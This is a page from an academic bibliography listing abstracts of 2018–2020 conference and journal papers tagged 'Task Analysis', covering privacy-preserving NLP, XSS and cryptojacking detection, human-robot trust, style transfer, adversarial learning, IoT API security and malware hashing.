Visible to the public Biblio

Found 431 results

Filters: Keyword is Task Analysis  [Clear All Filters]
2021-02-22
Martinelli, F., Marulli, F., Mercaldo, F., Marrone, S., Santone, A..  2020.  Enhanced Privacy and Data Protection using Natural Language Processing and Artificial Intelligence. 2020 International Joint Conference on Neural Networks (IJCNN). :1–8.

Artificial Intelligence systems have enabled significant benefits for users and society, but whilst the data for their feeding are always increasing, a side to privacy and security leaks is offered. The severe vulnerabilities to the right to privacy obliged governments to enact specific regulations to ensure privacy preservation in any kind of transaction involving sensitive information. In the case of digital and/or physical documents comprising sensitive information, the right to privacy can be preserved by data obfuscation procedures. The capability of recognizing sensitive information for obfuscation is typically entrusted to the experience of human experts, who are over-whelmed by the ever increasing amount of documents to process. Artificial intelligence could proficiently mitigate the effort of the human officers and speed up processes. Anyway, until enough knowledge won't be available in a machine readable format, automatic and effectively working systems can't be developed. In this work we propose a methodology for transferring and leveraging general knowledge across specific-domain tasks. We built, from scratch, specific-domain knowledge data sets, for training artificial intelligence models supporting human experts in privacy preserving tasks. We exploited a mixture of natural language processing techniques applied to unlabeled domain-specific documents corpora for automatically obtain labeled documents, where sensitive information are recognized and tagged. We performed preliminary tests just over 10.000 documents from the healthcare and justice domains. Human experts supported us during the validation. Results we obtained, estimated in terms of precision, recall and F1-score metrics across these two domains, were promising and encouraged us to further investigations.

2021-02-10
Kascheev, S., Olenchikova, T..  2020.  The Detecting Cross-Site Scripting (XSS) Using Machine Learning Methods. 2020 Global Smart Industry Conference (GloSIC). :265—270.
This article discusses the problem of detecting cross-site scripting (XSS) using machine learning methods. XSS is an attack in which malicious code is embedded on a page to interact with an attacker’s web server. The XSS attack ranks third in the ranking of key web application risks according to Open Source Foundation for Application Security (OWASP). This attack has not been studied for a long time. It was considered harmless. However, this is fallacious: the page or HTTP Cookie may contain very vulnerable data, such as payment document numbers or the administrator session token. Machine learning is a tool that can be used to detect XSS attacks. This article describes an experiment. As a result the model for detecting XSS attacks was created. Following machine learning algorithms are considered: the support vector method, the decision tree, the Naive Bayes classifier, and Logistic Regression. The accuracy of the presented methods is made a comparison.
Gomes, G., Dias, L., Correia, M..  2020.  CryingJackpot: Network Flows and Performance Counters against Cryptojacking. 2020 IEEE 19th International Symposium on Network Computing and Applications (NCA). :1—10.
Cryptojacking, the appropriation of users' computational resources without their knowledge or consent to obtain cryp-tocurrencies, is a widespread attack, relatively easy to implement and hard to detect. Either browser-based or binary, cryptojacking lacks robust and reliable detection solutions. This paper presents a hybrid approach to detect cryptojacking where no previous knowledge about the attacks or training data is needed. Our Cryp-tojacking Intrusion Detection Approach, Cryingjackpot, extracts and combines flow and performance counter-based features, aggregating hosts with similar behavior by using unsupervised machine learning algorithms. We evaluate Cryingjackpot experimentally with both an artificial and a hybrid dataset, achieving F1-scores up to 97%.
2021-02-08
Nikouei, S. Y., Chen, Y., Faughnan, T. R..  2018.  Smart Surveillance as an Edge Service for Real-Time Human Detection and Tracking. 2018 IEEE/ACM Symposium on Edge Computing (SEC). :336—337.

Monitoring for security and well-being in highly populated areas is a critical issue for city administrators, policy makers and urban planners. As an essential part of many dynamic and critical data-driven tasks, situational awareness (SAW) provides decision-makers a deeper insight of the meaning of urban surveillance. Thus, surveillance measures are increasingly needed. However, traditional surveillance platforms are not scalable when more cameras are added to the network. In this work, a smart surveillance as an edge service has been proposed. To accomplish the object detection, identification, and tracking tasks at the edge-fog layers, two novel lightweight algorithms are proposed for detection and tracking respectively. A prototype has been built to validate the feasibility of the idea, and the test results are very encouraging.

Haque, M. A., Shetty, S., Kamhoua, C. A., Gold, K..  2020.  Integrating Mission-Centric Impact Assessment to Operational Resiliency in Cyber-Physical Systems. GLOBECOM 2020 - 2020 IEEE Global Communications Conference. :1–7.

Developing mission-centric impact assessment techniques to address cyber resiliency in the cyber-physical systems (CPSs) requires integrating system inter-dependencies to the risk and resilience analysis process. Generally, network administrators utilize attack graphs to estimate possible consequences in a networked environment. Attack graphs lack to incorporate the operations-specific dependencies. Localizing the dependencies among operational missions, tasks, and the hosting devices in a large-scale CPS is also challenging. In this work, we offer a graphical modeling technique to integrate the mission-centric impact assessment of cyberattacks by relating the effect to the operational resiliency by utilizing a combination of the logical attack graph and mission impact propagation graph. We propose formal techniques to compute cyberattacks’ impact on the operational mission and offer an optimization process to minimize the same, having budgetary restrictions. We also relate the effect to the system functional operability. We illustrate our modeling techniques using a SCADA (supervisory control and data acquisition) case study for the cyber-physical power systems. We believe our proposed method would help evaluate and minimize the impact of cyber attacks on CPS’s operational missions and, thus, enhance cyber resiliency.

2021-02-03
Rabby, M. K. Monir, Khan, M. Altaf, Karimoddini, A., Jiang, S. X..  2020.  Modeling of Trust Within a Human-Robot Collaboration Framework. 2020 IEEE International Conference on Systems, Man, and Cybernetics (SMC). :4267—4272.

In this paper, a time-driven performance-aware mathematical model for trust in the robot is proposed for a Human-Robot Collaboration (HRC) framework. The proposed trust model is based on both the human operator and the robot performances. The human operator’s performance is modeled based on both the physical and cognitive performances, while the robot performance is modeled over its unpredictable, predictable, dependable, and faithful operation regions. The model is validated via different simulation scenarios. The simulation results show that the trust in the robot in the HRC framework is governed by robot performance and human operator’s performance and can be improved by enhancing the robot performance.

Xu, J., Howard, A..  2020.  How much do you Trust your Self-Driving Car? Exploring Human-Robot Trust in High-Risk Scenarios 2020 IEEE International Conference on Systems, Man, and Cybernetics (SMC). :4273—4280.

Trust is an important characteristic of successful interactions between humans and agents in many scenarios. Self-driving scenarios are of particular relevance when discussing the issue of trust due to the high-risk nature of erroneous decisions being made. The present study aims to investigate decision-making and aspects of trust in a realistic driving scenario in which an autonomous agent provides guidance to humans. To this end, a simulated driving environment based on a college campus was developed and presented. An online and an in-person experiment were conducted to examine the impacts of mistakes made by the self-driving AI agent on participants’ decisions and trust. During the experiments, participants were asked to complete a series of driving tasks and make a sequence of decisions in a time-limited situation. Behavior analysis indicated a similar relative trend in the decisions across these two experiments. Survey results revealed that a mistake made by the self-driving AI agent at the beginning had a significant impact on participants’ trust. In addition, similar overall experience and feelings across the two experimental conditions were reported. The findings in this study add to our understanding of trust in human-robot interaction scenarios and provide valuable insights for future research work in the field of human-robot trust.

Alarcon, G. M., Gibson, A. M., Jessup, S. A..  2020.  Trust Repair in Performance, Process, and Purpose Factors of Human-Robot Trust. 2020 IEEE International Conference on Human-Machine Systems (ICHMS). :1—6.

The current study explored the influence of trust and distrust behaviors on performance, process, and purpose (trustworthiness) perceptions over time when participants were paired with a robot partner. We examined the changes in trustworthiness perceptions after trust violations and trust repair after those violations. Results indicated performance, process, and purpose perceptions were all affected by trust violations, but perceptions of process and purpose decreased more than performance following a distrust behavior. Similarly, trust repair was achieved in performance perceptions, but trust repair in perceived process and purpose was absent. When a trust violation occurred, process and purpose perceptions deteriorated and failed to recover from the violation. In addition, the trust violation resulted in untrustworthy perceptions of the robot. In contrast, trust violations decreased partner performance perceptions, and subsequent trust behaviors resulted in a trust repair. These findings suggest that people are more sensitive to distrust behaviors in their perceptions of process and purpose than they are in performance perceptions.

2021-02-01
Wu, L., Chen, X., Meng, L., Meng, X..  2020.  Multitask Adversarial Learning for Chinese Font Style Transfer. 2020 International Joint Conference on Neural Networks (IJCNN). :1–8.
Style transfer between Chinese fonts is challenging due to both the complexity of Chinese characters and the significant difference between fonts. Existing algorithms for this task typically learn a mapping between the reference and target fonts for each character. Subsequently, this mapping is used to generate the characters that do not exist in the target font. However, the characters available for training are unlikely to cover all fine-grained parts of the missing characters, leading to the overfitting problem. As a result, the generated characters of the target font may suffer problems of incomplete or even radicals and dirty dots. To address this problem, this paper presents a multi-task adversarial learning approach, termed MTfontGAN, to generate more vivid Chinese characters. MTfontGAN learns to transfer a reference font to multiple target ones simultaneously. An alignment is imposed on the encoders of different tasks to make them focus on the important parts of the characters in general style transfer. Such cross-task interactions at the feature level effectively improve the generalization capability of MTfontGAN. The performance of MTfontGAN is evaluated on three Chinese font datasets. Experimental results show that MTfontGAN outperforms the state-of-the-art algorithms in a single-task setting. More importantly, increasing the number of tasks leads to better performance in all of them.
Wang, H., Li, Y., Wang, Y., Hu, H., Yang, M.-H..  2020.  Collaborative Distillation for Ultra-Resolution Universal Style Transfer. 2020 IEEE/CVF Conference on Computer Vision and Pattern Recognition (CVPR). :1857–1866.
Universal style transfer methods typically leverage rich representations from deep Convolutional Neural Network (CNN) models (e.g., VGG-19) pre-trained on large collections of images. Despite the effectiveness, its application is heavily constrained by the large model size to handle ultra-resolution images given limited memory. In this work, we present a new knowledge distillation method (named Collaborative Distillation) for encoder-decoder based neural style transfer to reduce the convolutional filters. The main idea is underpinned by a finding that the encoder-decoder pairs construct an exclusive collaborative relationship, which is regarded as a new kind of knowledge for style transfer models. Moreover, to overcome the feature size mismatch when applying collaborative distillation, a linear embedding loss is introduced to drive the student network to learn a linear embedding of the teacher's features. Extensive experiments show the effectiveness of our method when applied to different universal style transfer approaches (WCT and AdaIN), even if the model size is reduced by 15.5 times. Especially, on WCT with the compressed models, we achieve ultra-resolution (over 40 megapixels) universal style transfer on a 12GB GPU for the first time. Further experiments on optimization-based stylization scheme show the generality of our algorithm on different stylization paradigms. Our code and trained models are available at https://github.com/mingsun-tse/collaborative-distillation.
Han, W., Schulz, H.-J..  2020.  Beyond Trust Building — Calibrating Trust in Visual Analytics. 2020 IEEE Workshop on TRust and EXpertise in Visual Analytics (TREX). :9–15.
Trust is a fundamental factor in how users engage in interactions with Visual Analytics (VA) systems. While the importance of building trust to this end has been pointed out in research, the aspect that trust can also be misplaced is largely ignored in VA so far. This position paper addresses this aspect by putting trust calibration in focus – i.e., the process of aligning the user’s trust with the actual trustworthiness of the VA system. To this end, we present the trust continuum in the context of VA, dissect important trust issues in both VA systems and users, as well as discuss possible approaches that can build and calibrate trust.
Papadopoulos, A. V., Esterle, L..  2020.  Situational Trust in Self-aware Collaborating Systems. 2020 IEEE International Conference on Autonomic Computing and Self-Organizing Systems Companion (ACSOS-C). :91–94.
Trust among humans affects the way we interact with each other. In autonomous systems, this trust is often predefined and hard-coded before the systems are deployed. However, when systems encounter unfolding situations, requiring them to interact with others, a notion of trust will be inevitable. In this paper, we discuss trust as a fundamental measure to enable an autonomous system to decide whether or not to interact with another system, whether biological or artificial. These decisions become increasingly important when continuously integrating with others during runtime.
Hou, M..  2020.  IMPACT: A Trust Model for Human-Agent Teaming. 2020 IEEE International Conference on Human-Machine Systems (ICHMS). :1–4.
A trust model IMPACT: Intention, Measurability, Predictability, Agility, Communication, and Transparency has been conceptualized to build human trust in autonomous agents. The six critical characteristics must be exhibited by the agents in order to gain and maintain the trust from their human partners towards an effective and collaborative team in achieving common goals. The IMPACT model guided a design of an intelligent adaptive decision aid for dynamic target engagement processes in a military context. Positive feedback from subject matter experts participated in a large scale joint exercise controlling multiple unmanned vehicles indicated the effectiveness of the decision aid. It also demonstrated the utility of the IMPACT model as design principles for building up a trusted human-agent teaming.
Gupta, K., Hajika, R., Pai, Y. S., Duenser, A., Lochner, M., Billinghurst, M..  2020.  Measuring Human Trust in a Virtual Assistant using Physiological Sensing in Virtual Reality. 2020 IEEE Conference on Virtual Reality and 3D User Interfaces (VR). :756–765.
With the advancement of Artificial Intelligence technology to make smart devices, understanding how humans develop trust in virtual agents is emerging as a critical research field. Through our research, we report on a novel methodology to investigate user's trust in auditory assistance in a Virtual Reality (VR) based search task, under both high and low cognitive load and under varying levels of agent accuracy. We collected physiological sensor data such as electroencephalography (EEG), galvanic skin response (GSR), and heart-rate variability (HRV), subjective data through questionnaire such as System Trust Scale (STS), Subjective Mental Effort Questionnaire (SMEQ) and NASA-TLX. We also collected a behavioral measure of trust (congruency of users' head motion in response to valid/ invalid verbal advice from the agent). Our results indicate that our custom VR environment enables researchers to measure and understand human trust in virtual agents using the matrices, and both cognitive load and agent accuracy play an important role in trust formation. We discuss the implications of the research and directions for future work.
Lee, J., Abe, G., Sato, K., Itoh, M..  2020.  Impacts of System Transparency and System Failure on Driver Trust During Partially Automated Driving. 2020 IEEE International Conference on Human-Machine Systems (ICHMS). :1–3.
The objective of this study is to explore changes of trust by a situation where drivers need to intervene. Trust in automation is a key determinant for appropriate interaction between drivers and the system. System transparency and types of system failure influence shaping trust in a supervisory control. Subjective ratings of trust were collected to examine the impact of two factors: system transparency (Detailed vs. Less) and system failure (by Limits vs. Malfunction) in a driving simulator study in which drivers experienced a partially automated vehicle. We examined trust ratings at three points: before and after driver intervention in the automated vehicle, and after subsequent experience of flawless automated driving. Our result found that system transparency did not have significant impacts on trust change from before to after the intervention. System-malfunction led trust reduction compared to those of before the intervention, whilst system-limits did not influence trust. The subsequent experience recovered decreased trust, in addition, when the system-limit occurred to drivers who have detailed information about the system, trust prompted in spite of the intervention. The present finding has implications for automation design to achieve the appropriate level of trust.
2021-01-28
Romashchenko, V., Brutscheck, M., Chmielewski, I..  2020.  Organisation and Implementation of ResNet Face Recognition Architectures in the Environment of Zigbee-based Data Transmission Protocol. 2020 Fourth International Conference on Multimedia Computing, Networking and Applications (MCNA). :25—30.

This paper describes a realisation of a ResNet face recognition method through Zigbee-based wireless protocol. The system uses a CC2530 Zigbee-based radio frequency chip with connected VC0706 camera on it. The Arduino Nano had been used for organisation of data compression and effective division of Zigbee packets. The proposed solution also simplifies a data transmission within a strict bandwidth of Zigbee protocol and reliable packet forwarding in case of frequency distortion. The following investigation model uses Raspberry Pi 3 with connected Zigbee End Device (ZED) for successful receiving of important images and acceleration of deep learning interfaces. The model is integrated into a smart security system based on Zigbee modules, MySQL database, Android application and works in the background by using daemons procedures. To protect data, all wireless connections had been encrypted by the 128-bit Advanced Encryption Standard (AES-128) algorithm. Experimental results show a possibility to implement complex systems under restricted requirements of available transmission protocols.

He, H. Y., Yang, Z. Guo, Chen, X. N..  2020.  PERT: Payload Encoding Representation from Transformer for Encrypted Traffic Classification. 2020 ITU Kaleidoscope: Industry-Driven Digital Transformation (ITU K). :1—8.

Traffic identification becomes more important yet more challenging as related encryption techniques are rapidly developing nowadays. In difference to recent deep learning methods that apply image processing to solve such encrypted traffic problems, in this paper, we propose a method named Payload Encoding Representation from Transformer (PERT) to perform automatic traffic feature extraction using a state-of-the-art dynamic word embedding technique. Based on this, we further provide a traffic classification framework in which unlabeled traffic is utilized to pre-train an encoding network that learns the contextual distribution of traffic payload bytes. Then, the downward classification reuses the pre-trained network to obtain an enhanced classification result. By implementing experiments on a public encrypted traffic data set and our captured Android HTTPS traffic, we prove the proposed method can achieve an obvious better effectiveness than other compared baselines. To the best of our knowledge, this is the first time the encrypted traffic classification with the dynamic word embedding alone with its pre-training strategy has been addressed.

Seiler, M., Trautmann, H., Kerschke, P..  2020.  Enhancing Resilience of Deep Learning Networks By Means of Transferable Adversaries. 2020 International Joint Conference on Neural Networks (IJCNN). :1—8.

Artificial neural networks in general and deep learning networks in particular established themselves as popular and powerful machine learning algorithms. While the often tremendous sizes of these networks are beneficial when solving complex tasks, the tremendous number of parameters also causes such networks to be vulnerable to malicious behavior such as adversarial perturbations. These perturbations can change a model's classification decision. Moreover, while single-step adversaries can easily be transferred from network to network, the transfer of more powerful multi-step adversaries has - usually - been rather difficult.In this work, we introduce a method for generating strong adversaries that can easily (and frequently) be transferred between different models. This method is then used to generate a large set of adversaries, based on which the effects of selected defense methods are experimentally assessed. At last, we introduce a novel, simple, yet effective approach to enhance the resilience of neural networks against adversaries and benchmark it against established defense methods. In contrast to the already existing methods, our proposed defense approach is much more efficient as it only requires a single additional forward-pass to achieve comparable performance results.

2021-01-25
Chen, J., Lin, X., Shi, Z., Liu, Y..  2020.  Link Prediction Adversarial Attack Via Iterative Gradient Attack. IEEE Transactions on Computational Social Systems. 7:1081–1094.
Increasing deep neural networks are applied in solving graph evolved tasks, such as node classification and link prediction. However, the vulnerability of deep models can be revealed using carefully crafted adversarial examples generated by various adversarial attack methods. To explore this security problem, we define the link prediction adversarial attack problem and put forward a novel iterative gradient attack (IGA) strategy using the gradient information in the trained graph autoencoder (GAE) model. Not surprisingly, GAE can be fooled by an adversarial graph with a few links perturbed on the clean one. The results on comprehensive experiments of different real-world graphs indicate that most deep models and even the state-of-the-art link prediction algorithms cannot escape the adversarial attack, such as GAE. We can benefit the attack as an efficient privacy protection tool from the link prediction of unknown violations. On the other hand, the adversarial attack is a robust evaluation metric for current link prediction algorithms of their defensibility.
2021-01-20
Li, Y., Yang, Y., Yu, X., Yang, T., Dong, L., Wang, W..  2020.  IoT-APIScanner: Detecting API Unauthorized Access Vulnerabilities of IoT Platform. 2020 29th International Conference on Computer Communications and Networks (ICCCN). :1—5.

The Internet of Things enables interaction between IoT devices and users through the cloud. The cloud provides services such as account monitoring, device management, and device control. As the center of the IoT platform, the cloud provides services to IoT devices and IoT applications through APIs. Therefore, the permission verification of the API is essential. However, we found that some APIs are unverified, which allows unauthorized users to access cloud resources or control devices; it could threaten the security of devices and cloud. To check for unauthorized access to the API, we developed IoT-APIScanner, a framework to check the permission verification of the cloud API. Through observation, we found there is a large amount of interactive information between IoT application and cloud, which include the APIs and related parameters, so we can extract them by analyzing the code of the IoT application, and use this for mutating API test cases. Through these test cases, we can effectively check the permissions of the API. In our research, we extracted a total of 5 platform APIs. Among them, the proportion of APIs without permission verification reached 13.3%. Our research shows that attackers could use the API without permission verification to obtain user privacy or control of devices.

Mindermann, K., Wagner, S..  2020.  Fluid Intelligence Doesn't Matter! Effects of Code Examples on the Usability of Crypto APIs. 2020 IEEE/ACM 42nd International Conference on Software Engineering: Companion Proceedings (ICSE-Companion). :306—307.

Context : Programmers frequently look for the code of previously solved problems that they can adapt for their own problem. Despite existing example code on the web, on sites like Stack Overflow, cryptographic Application Programming Interfaces (APIs) are commonly misused. There is little known about what makes examples helpful for developers in using crypto APIs. Analogical problem solving is a psychological theory that investigates how people use known solutions to solve new problems. There is evidence that the capacity to reason and solve novel problems a.k.a Fluid Intelligence (Gf) and structurally and procedurally similar solutions support problem solving. Aim: Our goal is to understand whether similarity and Gf also have an effect in the context of using cryptographic APIs with the help of code examples. Method : We conducted a controlled experiment with 76 student participants developing with or without procedurally similar examples, one of two Java crypto libraries and measured the Gf of the participants as well as the effect on usability (effectiveness, efficiency, satisfaction) and security bugs. Results: We observed a strong effect of code examples with a high procedural similarity on all dependent variables. Fluid intelligence Gf had no effect. It also made no difference which library the participants used. Conclusions: Example code must be more highly similar to a concrete solution, not very abstract and generic to have a positive effect in a development task.

2021-01-18
Laptiev, O., Shuklin, G., Hohonianc, S., Zidan, A., Salanda, I..  2019.  Dynamic Model of Cyber Defense Diagnostics of Information Systems With The Use of Fuzzy Technologies. 2019 IEEE International Conference on Advanced Trends in Information Theory (ATIT). :116–119.
When building the architecture of cyber defense systems, one of the important tasks is to create a methodology for current diagnostics of cybersecurity status of information systems and objects of information activity. The complexity of this procedure is that having a strong security level of the object at the software level does not mean that such power is available at the hardware level or at the cryptographic level. There are always weaknesses in all levels of information security that criminals are constantly looking for. Therefore, the task of promptly calculating the likelihood of possible negative consequences from the successful implementation of cyberattacks is an urgent task today. This paper proposes an approach of obtaining an instantaneous calculation of the probabilities of negative consequences from the successful implementation of cyberattacks on objects of information activity on the basis of delayed differential equation theory and the mechanism of constructing a logical Fuzzy function. This makes it possible to diagnose the security status of the information system.
Huitzil, I., Fuentemilla, Á, Bobillo, F..  2020.  I Can Get Some Satisfaction: Fuzzy Ontologies for Partial Agreements in Blockchain Smart Contracts. 2020 IEEE International Conference on Fuzzy Systems (FUZZ-IEEE). :1–8.
This paper proposes a novel extension of blockchain systems with fuzzy ontologies. The main advantage is to let the users have flexible restrictions, represented using fuzzy sets, and to develop smart contracts where there is a partial agreement among the involved parts. We propose a general architecture based on four fuzzy ontologies and a process to develop and run the smart contracts, based on a reduction to a well-known fuzzy ontology reasoning task (Best Satisfiability Degree). We also investigate different operators to compute Pareto-optimal solutions and implement our approach in the Ethereum blockchain.
Naik, N., Jenkins, P., Savage, N., Yang, L., Boongoen, T., Iam-On, N..  2020.  Fuzzy-Import Hashing: A Malware Analysis Approach. 2020 IEEE International Conference on Fuzzy Systems (FUZZ-IEEE). :1–8.
Malware has remained a consistent threat since its emergence, growing into a plethora of types and in large numbers. In recent years, numerous new malware variants have enabled the identification of new attack surfaces and vectors, and have become a major challenge to security experts, driving the enhancement and development of new malware analysis techniques to contain the contagion. One of the preliminary steps of malware analysis is to remove the abundance of counterfeit malware samples from the large collection of suspicious samples. This process assists in the management of man and machine resources effectively in the analysis of both unknown and likely malware samples. Hashing techniques are one of the fastest and efficient techniques for performing this preliminary analysis such as fuzzy hashing and import hashing. However, both hashing methods have their limitations and they may not be effective on their own, instead the combination of two distinctive methods may assist in improving the detection accuracy and overall performance of the analysis. This paper proposes a Fuzzy-Import hashing technique which is the combination of fuzzy hashing and import hashing to improve the detection accuracy and overall performance of malware analysis. This proposed Fuzzy-Import hashing offers several benefits which are demonstrated through the experimentation performed on the collected malware samples and compared against stand-alone techniques of fuzzy hashing and import hashing.
2021-01-15
Brockschmidt, J., Shang, J., Wu, J..  2019.  On the Generality of Facial Forgery Detection. 2019 IEEE 16th International Conference on Mobile Ad Hoc and Sensor Systems Workshops (MASSW). :43—47.
A variety of architectures have been designed or repurposed for the task of facial forgery detection. While many of these designs have seen great success, they largely fail to address challenges these models may face in practice. A major challenge is posed by generality, wherein models must be prepared to perform in a variety of domains. In this paper, we investigate the ability of state-of-the-art facial forgery detection architectures to generalize. We first propose two criteria for generality: reliably detecting multiple spoofing techniques and reliably detecting unseen spoofing techniques. We then devise experiments which measure how a given architecture performs against these criteria. Our analysis focuses on two state-of-the-art facial forgery detection architectures, MesoNet and XceptionNet, both being convolutional neural networks (CNNs). Our experiments use samples from six state-of-the-art facial forgery techniques: Deepfakes, Face2Face, FaceSwap, GANnotation, ICface, and X2Face. We find MesoNet and XceptionNet show potential to generalize to multiple spoofing techniques but with a slight trade-off in accuracy, and largely fail against unseen techniques. We loosely extrapolate these results to similar CNN architectures and emphasize the need for better architectures to meet the challenges of generality.